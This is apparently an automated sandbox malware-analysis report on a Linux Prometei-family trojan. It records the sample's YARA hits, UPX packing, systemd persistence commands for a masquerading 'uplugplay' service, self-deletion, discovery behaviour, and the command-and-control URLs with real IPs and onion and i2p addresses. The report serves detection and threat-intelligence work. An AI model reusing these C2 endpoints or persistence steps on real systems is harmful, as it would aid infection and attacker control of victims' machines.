Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37348
Source: unknown	Network traffic detected: HTTP traffic on port 37348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59334

System Summary

Malicious sample detected (through community Yara rule)

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: 5454.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 Author: unknown
Source: 5454.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 Author: unknown
Source: 5454.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 Author: unknown

Source: na.elf, type: SAMPLE	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: 5454.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_1a4eb229 reference_sample = bf6f3ffaf94444a09b69cbd4c8c0224d7eb98eb41514bdc3f58c1fb90ac0e705, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = de076ef23c2669512efc00ddfe926ef04f8ad939061c69131a0ef9a743639371, id = 1a4eb229-a194-46a5-8e93-370a40ba999b, last_modified = 2021-09-16
Source: 5454.1.0000000000401000.00000000004f9000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Hacktool_Flooder_f454ec10 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 0297e1ad6e180af85256a175183102776212d324a2ce0c4f32e8a44a2e2e9dad, license = Elastic License v2, threat_name = Linux.Hacktool.Flooder, fingerprint = 2ae5e2c3190a4ce5d238efdb10ac0520987425fb7af52246b6bf948abd0259da, id = f454ec10-7a67-4717-9e95-fecb7c357566, last_modified = 2022-01-26
Source: 5454.1.000000000052d000.0000000001575000.rw-.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26
Source: /usr/sbin/uplugplay, type: DROPPED	Matched rule: Linux_Trojan_Dofloo_ac3333d1 severity = 100, os = linux, arch_context = x86, creation_date = 2022-01-05, scan_context = file, memory, reference = 04664dc5ea14ddff5301e66c46d6795f1582c148b5cb621248424d015245c95e, license = Elastic License v2, threat_name = Linux.Trojan.Dofloo, fingerprint = a8f360e2a545e65b5f9f2273715c1a5008a0fe4f88f6e14becd6e69158aab409, id = ac3333d1-df88-459b-a411-00b4fc947f3f, last_modified = 2022-01-26

Source: classification engine

Classification label: mal100.troj.evad.linELF@0/13@5/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 4.24 Copyright (C) 1996-2024 the UPX Team. All Rights Reserved. $

Source: /usr/bin/pidof (PID: 5464)	Directory: //.	Jump to behavior
Source: /usr/bin/pidof (PID: 5489)	Directory: //.	Jump to behavior
Source: /usr/bin/gpg (PID: 5501)	File: /var/lib/fwupd/gnupg/.#lk0x000055e17e839b80.galassia.5501	Jump to behavior
Source: /usr/bin/gpg (PID: 5503)	File: /var/lib/fwupd/gnupg/.#lk0x00005628bd044b80.galassia.5503	Jump to behavior
Source: /usr/bin/gpg (PID: 5509)	File: /var/lib/fwupd/gnupg/.#lk0x00005630efaf2b80.galassia.5509	Jump to behavior
Source: /usr/bin/gpg (PID: 5522)	File: /var/lib/fwupd/gnupg/.#lk0x0000560caad68b80.galassia.5522	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5555)	Directory: <invalid fd (10)>/..	Jump to behavior

Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1583/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1583/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/2672/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/2672/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/110/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/110/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/111/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/111/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/112/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/112/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/113/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/113/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/234/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/234/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1577/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1577/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/114/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/114/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/235/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/235/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/115/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/115/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/116/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/116/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/117/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/117/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/118/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/118/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/119/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/119/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3636/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3636/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/10/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/10/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/917/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/917/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/11/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/11/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/12/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/12/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/13/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/13/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/14/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/14/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/15/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/15/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/16/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/16/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/17/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/17/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/18/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/18/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/19/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/19/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1593/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1593/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/240/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/240/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/120/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/120/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3094/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3094/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/121/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/121/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/242/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/242/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3406/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3406/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/122/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/122/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/243/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/243/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/2/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/2/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/123/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/123/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/244/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/244/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1589/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1589/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/124/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/124/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/245/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/245/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1588/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/1588/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/125/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/125/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/4/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/4/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/246/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/246/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3402/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/3402/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/126/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/126/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/5/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/5/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/247/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/247/cmdline	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/127/status	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	File opened: /proc/127/cmdline	Jump to behavior

Source: /tmp/na.elf (PID: 5457)	Shell command executed: sh -c "pgrep na.elf"	Jump to behavior
Source: /tmp/na.elf (PID: 5463)	Shell command executed: sh -c "pidof na.elf"	Jump to behavior
Source: /tmp/na.elf (PID: 5467)	Shell command executed: sh -c "pgrep uplugplay"	Jump to behavior
Source: /tmp/na.elf (PID: 5471)	Shell command executed: sh -c "pgrep upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 5477)	Shell command executed: sh -c "pidof upnpsetup"	Jump to behavior
Source: /tmp/na.elf (PID: 5504)	Shell command executed: sh -c "systemctl daemon-reload"	Jump to behavior
Source: /tmp/na.elf (PID: 5513)	Shell command executed: sh -c "systemctl enable uplugplay.service"	Jump to behavior
Source: /tmp/na.elf (PID: 5519)	Shell command executed: sh -c "systemctl start uplugplay.service"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5534)	Shell command executed: sh -c "/usr/sbin/uplugplay -Dcomsvc"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5539)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5553)	Shell command executed: sh -c hostnamectl	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5690)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5693)	Shell command executed: sh -c uptime	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5698)	Shell command executed: sh -c "uname -a"	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5702)	Shell command executed: sh -c "uname -a"	Jump to behavior

Source: /bin/sh (PID: 5458)	Pgrep executable: /usr/bin/pgrep -> pgrep na.elf	Jump to behavior
Source: /bin/sh (PID: 5468)	Pgrep executable: /usr/bin/pgrep -> pgrep uplugplay	Jump to behavior
Source: /bin/sh (PID: 5472)	Pgrep executable: /usr/bin/pgrep -> pgrep upnpsetup	Jump to behavior

Source: /usr/bin/dash (PID: 5779)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.qGJ3bwLjXY /tmp/tmp.1CaqzfB7yS /tmp/tmp.LOsFLDTnx1			Jump to behavior
Source: /usr/bin/dash (PID: 5780)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.qGJ3bwLjXY /tmp/tmp.1CaqzfB7yS /tmp/tmp.LOsFLDTnx1			Jump to behavior

Source: /bin/sh (PID: 5505)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload	Jump to behavior
Source: /bin/sh (PID: 5514)	Systemctl executable: /usr/bin/systemctl -> systemctl enable uplugplay.service	Jump to behavior
Source: /bin/sh (PID: 5520)	Systemctl executable: /usr/bin/systemctl -> systemctl start uplugplay.service	Jump to behavior

Source: /usr/sbin/uplugplay (PID: 5535)	Reads from proc file: /proc/cpuinfo	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5535)	Reads from proc file: /proc/stat	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5535)	Reads from proc file: /proc/meminfo	Jump to behavior

Source: /tmp/na.elf (PID: 5454)

File: /usr/sbin/uplugplay (bits: -v usr: x grp: x all: r)

Jump to behavior

Source: /tmp/na.elf (PID: 5454)

File written: /usr/sbin/uplugplay

Jump to dropped file

Source: submitted sample

Stderr: Created symlink /etc/systemd/system/multi-user.target.wants/uplugplay.service /lib/systemd/system/uplugplay.service.: exit code = 0

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/na.elf (PID: 5454)

File: /usr/sbin/uplugplay

Jump to dropped file

Sample deletes itself

Source: /tmp/na.elf (PID: 5454)

File: /tmp/na.elf

Jump to behavior

Source: uplugplay.12.dr	Dropped file: segment LOAD with 7.6054 entropy (max. 8.0)
Source: uplugplay.12.dr	Dropped file: segment LOAD with 7.943 entropy (max. 8.0)

Source: /usr/sbin/uplugplay (PID: 5535)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Source: /usr/bin/pgrep (PID: 5458)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5468)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/pgrep (PID: 5472)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5535)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5694)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior
Source: /usr/bin/uptime (PID: 5695)	Reads CPU info from /sys: /sys/devices/system/cpu/online	Jump to behavior

Source: /tmp/na.elf (PID: 5454)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5501)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5503)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5509)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpg (PID: 5522)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5523)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/sbin/uplugplay (PID: 5535)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 5699)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/uname (PID: 5703)	Queries kernel information via 'uname':	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5555)	Queries kernel information via 'uname':	Jump to behavior

Source: /bin/sh (PID: 5699)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior
Source: /bin/sh (PID: 5703)	Uname executable: /usr/bin/uname -> uname -a			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Systemd Service	1 Systemd Service	1 Masquerading	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	Boot or Logon Initialization Scripts	1 File and Directory Permissions Modification	LSASS Memory	4 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Hidden Files and Directories	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	1 Proxy	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
na.elf	47%	ReversingLabs	Linux.Trojan.Generic
na.elf	100%	Avira	LINUX/GM.Agent.JQ

Dropped Files

Source	Detection	Scanner	Label	Link
/usr/sbin/uplugplay	100%	Avira	LINUX/GM.Agent.JQ
/usr/sbin/uplugplay	47%	ReversingLabs	Linux.Trojan.Generic

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://xindbcfda.org/cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_	0%	Avira URL Cloud	safe
http://xinchaodbcfda.net/cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_	0%	Avira URL Cloud	safe
http://152.36.128.18/cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA	100%	Avira URL Cloud	malware

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
xindbcfda.org	85.214.228.140	true	false	high
xinchaodbcfda.net	52.26.80.133	true	false	high
xinchaodbcfda.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://152.36.128.18/cgi-bin/p.cgi?r=16&i=HG6TD1RQ3I303VPA	true	Avira URL Cloud: malware	unknown
http://xinchaodbcfda.net/cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_	false	Avira URL Cloud: safe	unknown
http://xindbcfda.org/cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://152.36.128.18/cgi-bin/p.cgihttp://dummy.zero/cgi-bin/prometei.cgihttps://gb7ni5rgeexdcncj.oni	na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://upx.sf.net	na.elf, uplugplay.12.dr	false	high
http://mkhkjxgchtfgu7uhofxzgoawntfzrkdccymveektqgpxrpjb72oq.b32.i2p/cgi-bin/prometei.cgi	na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
https://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi	na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128.18/cgi-bin/p.cgi	na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://dummy.zero/cgi-bin/prometei.cgi	na.elf, 5454.1.000000000052d000.0000000001575000.rw-.sdmp	false	high
http://152.36.128	na.elf, uplugplay.12.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
85.214.228.140	xindbcfda.org	Germany	6724	STRATOSTRATOAGDE	false
199.232.90.49	unknown	United States	54113	FASTLYUS	false
152.36.128.18	unknown	United States	81	NCRENUS	true
34.254.182.186	unknown	United States	16509	AMAZON-02US	false
54.247.62.1	unknown	United States	16509	AMAZON-02US	false
52.26.80.133	xinchaodbcfda.net	United States	16509	AMAZON-02US	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
85.214.228.140	2vt65gnmAr.exe	Get hash	malicious	Unknown	Browse	aafibwgqhfb.info/
	1 (325).exe	Get hash	malicious	Unknown	Browse	aafibwgqhfb.info/
	Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Get hash	malicious	PureLog Stealer, RedLine, XWorm	Browse	dlynankz.biz/asw
	Request for Quotation 2170032137 PDF.exe	Get hash	malicious	FormBook	Browse	dlynankz.biz/cwlwsc
	Swift_Message_Notification_MTC-U27635728_03-2025.exe	Get hash	malicious	PureLog Stealer, RedLine, XWorm	Browse	dlynankz.biz/cfidxwjxxl
	CV_Sales Representative - Job Request PDF.exe	Get hash	malicious	FormBook	Browse	dlynankz.biz/dielwuec
	Supply Tender documents PDF.exe	Get hash	malicious	FormBook	Browse	dlynankz.biz/nkw
	DHL Original Shipment Document PDF.exe	Get hash	malicious	FormBook	Browse	dlynankz.biz/okmfwvwiisx
	MUH030425.exe	Get hash	malicious	Azorult	Browse	dlynankz.biz/rgpseg
	redline stealer.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	dlynankz.biz/blyebryociterum
199.232.90.49	l7vmra.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	miori.arm7.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
	miori.arm5.elf	Get hash	malicious	Unknown	Browse
	Mozi.a.elf	Get hash	malicious	Unknown	Browse
	na.elf	Get hash	malicious	Prometei	Browse
152.36.128.18	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=22&i=162XYDVI8U344LH4
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=8711V51Q45KM5B9L
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=4&i=213U6SANKFY6LBV1
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=31&i=8LCN4KQ5FG8UGTSN
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=7&i=02ZQF59YO97QSN16
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=18&i=3590ZZ6L7CIM03B1
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=080ZX3RN6S3YO8YV
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=24&i=ITO34I304D6614V4
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=13&i=U040325A779G7J6U
	na.elf	Get hash	malicious	Prometei	Browse	152.36.128.18/cgi-bin/p.cgi?r=8&i=X2Q9G3G42P689U7H

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xindbcfda.org	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
	na.elf	Get hash	malicious	Prometei	Browse	85.214.228.140
xinchaodbcfda.net	na.elf	Get hash	malicious	Prometei	Browse	52.26.80.133
	na.elf	Get hash	malicious	Prometei	Browse	52.26.80.133
	na.elf	Get hash	malicious	Prometei	Browse	52.26.80.133
	na.elf	Get hash	malicious	Prometei	Browse	52.26.80.133
